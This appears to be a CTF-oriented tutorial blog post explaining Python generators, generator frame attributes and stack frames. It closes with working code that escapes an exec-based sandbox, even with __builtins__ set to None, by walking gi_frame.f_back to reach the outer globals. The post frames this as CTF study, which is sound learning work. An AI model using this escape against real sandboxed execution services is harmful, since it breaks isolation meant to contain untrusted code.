preamble
I kept running into this kind of challenge at big competitions but never had time to study it properly, so I am catching up on it now :)
Generator Introduction
A Generator is a special kind of iterator in Python that dynamically generates values during iteration without storing all the values in memory at once.
Simple Demo
A generator function is defined below. It uses the yield statement to produce values: each time next() is called on the generator, the generator runs until it reaches the next yield statement and then returns the value that follows yield, which here is the value of a.
def f():
    a = 1
    while True:
        yield a
        a += 1

f = f()
print(next(f))  # 1
print(next(f))  # 2
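To make the pause-and-resume behaviour concrete, here is a minimal sketch. The names `counter` and `log` are illustrative and not part of the demo above; the list simply records when the generator body actually runs.

```python
log = []  # hypothetical helper list that records when the generator body runs

def counter():
    log.append("started")
    a = 1
    while True:
        log.append(f"about to yield {a}")
        yield a
        a += 1

gen = counter()
created_log = list(log)  # snapshot: calling counter() has not run the body yet
first = next(gen)        # runs the body up to the first yield
second = next(gen)       # resumes after the yield and runs to the next one

print(created_log)    # []
print(first, second)  # 1 2
print(log)            # ['started', 'about to yield 1', 'about to yield 2']
```

Calling the generator function only creates the generator object; the body starts on the first next() and is suspended again at every yield.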
You can also iterate over the generator to get all of its values:
def f():
    a = 1
    for i in range(1, 100):
        yield a
        a += 1

f = f()
for value in f:
    print(value)
Generator Expressions
Generator expressions are a compact way of creating generators in Python. Like list comprehensions, they let you define a generator with a concise syntax, without explicitly writing a function. The syntax is the same as for a list comprehension, except that it uses parentheses instead of square brackets. A generator expression produces its values one by one rather than building the entire sequence at once, which uses memory more efficiently.
f = (i + 1 for i in range(100))
# You can use next to get the values step by step
print(next(f))
# You can also get all the remaining values by iterating
for value in f:
    print(value)
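As a rough illustration of the memory point, the sketch below compares a list comprehension with the equivalent generator expression. The variable names and the range size are arbitrary choices for this example, and sys.getsizeof only measures the container object itself, not the integers it refers to.

```python
import sys

squares_list = [i * i for i in range(100_000)]  # builds every element up front
squares_gen = (i * i for i in range(100_000))   # builds nothing until iterated

list_size = sys.getsizeof(squares_list)  # grows with the number of elements
gen_size = sys.getsizeof(squares_gen)    # small and independent of the range length

# Consuming the generator still produces the same values, one at a time.
same_total = sum(squares_gen) == sum(squares_list)

print(list_size > gen_size)  # True
print(same_total)            # True
```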
Generator Properties
- gi_code: The code object corresponding to the generator.
- gi_frame: The frame (stack frame) object corresponding to the generator.
- gi_running: Whether the generator is currently executing. It is False (0) while the generator is suspended at a yield, that is, after the yield and before the next line of code following it is executed.
- gi_yieldfrom: If the generator is yielding values from another generator (yield from), a reference to that generator object; otherwise None.
- gi_frame.f_locals: A dictionary containing the local variables of the generator's current frame.
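The attributes listed above can be inspected on a live generator. This is a small sketch with made-up generator functions `outer` and `inner`; the locals are copied with dict() so the printout looks the same regardless of how a given Python version represents f_locals.

```python
def inner():
    yield "from inner"

def outer():
    count = 1
    yield count
    yield from inner()  # delegate to another generator

gen = outer()
code_name = gen.gi_code.co_name  # name of the code object behind the generator
running_before = gen.gi_running  # the generator is not executing right now

next(gen)                        # run to the first yield
locals_snapshot = dict(gen.gi_frame.f_locals)
delegate_before = gen.gi_yieldfrom  # not inside "yield from" yet

next(gen)                        # now suspended inside "yield from inner()"
delegate_name = gen.gi_yieldfrom.gi_code.co_name

print(code_name)        # outer
print(running_before)   # False
print(locals_snapshot)  # {'count': 1}
print(delegate_before)  # None
print(delegate_name)    # inner
```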
gi_frame usage
gi_frame is an attribute of generator objects (native coroutines expose the analogous cr_frame). It points to the frame object in which the generator is currently executing or suspended, and it is None once the generator has finished. The frame object represents the current execution context and contains information such as the local variables and the last executed bytecode instruction.
def my_generator():
    yield 1
    yield 2
    yield 3

gen = my_generator()
# Get the current frame information of the generator
frame = gen.gi_frame
# Output the current frame information of the generator
print("Local Variables:", frame.f_locals)
print("Global Variables:", frame.f_globals)
print("Code Object:", frame.f_code)
print("Instruction Pointer:", frame.f_lasti)
The example above shows how to read the generator's frame information.
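The frame is not static: it tracks the generator's progress. The following sketch (variable names are illustrative) records f_lineno and f_lasti at two suspension points and shows that gi_frame becomes None once the generator is exhausted.

```python
def my_generator():
    yield 1
    yield 2

gen = my_generator()

next(gen)  # suspended at the first yield
first_line = gen.gi_frame.f_lineno
first_lasti = gen.gi_frame.f_lasti

next(gen)  # suspended at the second yield
second_line = gen.gi_frame.f_lineno
second_lasti = gen.gi_frame.f_lasti

remaining = list(gen)        # run the generator to completion
frame_after = gen.gi_frame   # the frame is released once the generator finishes

print(second_line - first_line)    # 1 (the two yields are on consecutive lines)
print(second_lasti > first_lasti)  # True
print(remaining, frame_after)      # [] None
```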
Introducing Stack Frames (frames)
In Python, a stack frame (or simply a frame) is the data structure that holds the state of a piece of executing code. Whenever the interpreter calls a function or method, it creates a new frame to store the local variables, arguments, return address, and other execution-related information. These frames are organized into a stack, called the call stack, in the order in which they were called. (This is similar to the stack in C/C++; a little reverse-engineering background makes it easier to understand.)
Stack frames have the following important attributes:
- f_locals: A dictionary containing the local variables of the function or method. The keys are the variable names.
- f_globals: A dictionary containing the global variables of the module in which the function or method is defined.
- f_code: A code object that contains the bytecode instructions, constants, variable names, and other information about the function or method.
- f_lasti: An integer giving the index of the last bytecode instruction executed.
- f_back: A reference to the caller's frame (the previous frame on the call stack), or None for the bottom-most frame. Following f_back repeatedly walks the call stack.
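The role of f_back can be sketched by walking the call stack by hand. The function names below are hypothetical; inspect.currentframe() is used to obtain the starting frame.

```python
import inspect

def call_chain():
    """Collect code-object names from the current frame outward via f_back."""
    names = []
    frame = inspect.currentframe()
    while frame is not None:
        names.append(frame.f_code.co_name)
        frame = frame.f_back  # step to the caller's frame
    return names

def inner():
    return call_chain()

def outer():
    return inner()

names = outer()
print(names[:3])  # ['call_chain', 'inner', 'outer']
```

Anything after the first three entries depends on how the script itself was started.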
Escaping the sandbox with a frame stack
The idea is to start from a frame object obtained through the generator and walk back through f_back (the previous frame) until we reach a frame outside the sandbox, then read that frame's globals symbol table. For example:
key = "this is flag"
codes = '''
def waff():
    def f():
        yield g.gi_frame.f_back
    g = f()  # generator
    frame = next(g)  # get the frame object yielded by the generator (waff's frame)
    b = frame.f_back.f_back.f_globals['key']  # walk back two frames and read the outer globals
    return b
b = waff()
'''
locals = {}
code = compile(codes, "", "exec")
exec(code, locals, None)
print(locals["b"])  # this is flag
After escaping, we can call functions that live outside the sandbox and use them to execute malicious commands.
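To see why exactly two f_back steps are needed in the example above, the sketch below records the chain of frames starting from the one the generator yields. The names `chain` and `sandbox_globals` are illustrative; the second tuple element says whether a frame still uses the sandbox's globals.

```python
source = '''
def waff():
    def f():
        yield g.gi_frame.f_back
    g = f()
    frame = next(g)
    chain = []
    while frame is not None:
        # record the code name and whether this frame still sees the sandbox globals
        chain.append((frame.f_code.co_name, frame.f_globals is globals()))
        frame = frame.f_back
    return chain
chain = waff()
'''

sandbox_globals = {}
exec(compile(source, "<sandbox>", "exec"), sandbox_globals)
chain = sandbox_globals["chain"]

print(chain[0])     # ('waff', True)      the frame yielded by the generator
print(chain[1])     # ('<module>', True)  the sandboxed code run by exec
print(chain[2][1])  # False               the frame that called exec: outside the sandbox
```

The yielded frame is waff's, its f_back is the module-level sandbox code, and the next f_back is the caller of exec, whose f_globals is the dictionary the escape is after.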
The __builtins__ field in globals
The __builtins__ module is loaded automatically when the Python interpreter starts and contains the built-in functions, exceptions, and other built-in objects.
Suppose the sandbox is set up like this:
key = "this is flag"
codes = '''
def waff():
    def f():
        yield g.gi_frame.f_back
    g = f()  # generator
    frame = next(g)  # get the frame object yielded by the generator (waff's frame)
    b = frame.f_back.f_back.f_globals['key']  # walk back two frames and read the outer globals
    return b
b = waff()
'''
locals = {"__builtins__": None}
code = compile(codes, "", "exec")
exec(code, locals, None)
print(locals["b"])
Here the sandbox's __builtins__ is set to None, so code inside the sandbox cannot call any built-in functions. Running this code raises an error because next is no longer available. How can we get the generator's value without next? As shown earlier, a generator's values can also be obtained by iterating over it:
key = "this is flag"
codes = '''
def waff():
    def f():
        yield g.gi_frame.f_back
    g = f()  # generator
    frame = [i for i in g][0]  # get the frame object through a list comprehension instead of next()
    b = frame.f_back.f_back.f_back.f_globals['key']  # one extra f_back to step out of the <listcomp> frame
    return b
b = waff()
'''
locals = {"__builtins__": None}
code = compile(codes, "", "exec")
exec(code, locals, None)
print(locals["b"])
This successfully retrieves the value of key. Note, however, that the assignment to b now needs one extra f_back: because the generator is consumed by a list comprehension, the frame it yields belongs to a different code object:
frame = next(g)
<frame at 0x00000235C9718440, file '', line 7, code waff>
frame = [i for i in g][0]
<frame at 0x000002708F2ED8C0, file '', line 9, code <listcomp>>
The frame obtained through the list comprehension belongs to the <listcomp> code object, so we still have to step back to the frame before it. That is why one more f_back is needed.
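Whether a comprehension gets its own frame depends on the interpreter version: the `<listcomp>` frame shown above exists before Python 3.12, while from 3.12 on comprehensions are inlined (PEP 709) and no extra frame appears. The sketch below is one way to check this, plus a variant (not from the original write-up) that drives the generator with a plain for loop, which needs no builtins and adds no frame, so two f_back steps suffice. `comprehension_has_own_frame` and the other names are hypothetical.

```python
import sys

def comprehension_has_own_frame():
    # Hypothetical helper: compare the frame seen inside a list
    # comprehension with this function's own frame.
    here = sys._getframe()
    inside = [sys._getframe() for _ in [0]][0]
    return inside is not here

source = '''
def waff():
    def f():
        yield g.gi_frame.f_back
    g = f()
    for frame in g:  # a plain for loop: no builtins needed, no extra frame
        break
    return frame.f_back.f_back.f_globals
leaked = waff()
'''

sandbox_globals = {"__builtins__": None}
exec(compile(source, "<sandbox>", "exec"), sandbox_globals)

# The leaked dictionary is the globals of the code that called exec.
escaped = sandbox_globals["leaked"] is globals()

print(comprehension_has_own_frame())  # depends on the Python version
print(escaped)                        # True
```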
A more compact way to write it
Example:
q = (q.gi_frame.f_back.f_back.f_globals for _ in [1])
g = [*q][0]
- The first line only creates the generator; its body is not executed yet.
- The second line unpacks the generator, and the unpacking triggers its execution. This is when q.gi_frame.f_back.f_back.f_globals is evaluated.
- Calling exec creates one new stack frame, and running the generator q creates another. So starting from q.gi_frame, we need to step back twice to get out of exec.
- Reading f_globals from that frame gives the globals outside the sandbox.
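Put together, the steps above can be tried with a small harness like the one below. It is a sketch that assumes the two lines run at the top level of the code passed to exec; `source`, `sandbox_globals`, and `leaked` are illustrative names.

```python
source = '''
q = (q.gi_frame.f_back.f_back.f_globals for _ in [1])
g = [*q][0]
'''

sandbox_globals = {"__builtins__": None}
exec(compile(source, "<sandbox>", "exec"), sandbox_globals)

leaked = sandbox_globals["g"]
is_outer_globals = leaked is globals()          # the globals of the code that called exec
is_sandbox_globals = leaked is sandbox_globals  # not the restricted dictionary

print(is_outer_globals)    # True
print(is_sandbox_globals)  # False
```

Neither line uses a built-in name, which is why this form still works when __builtins__ is None.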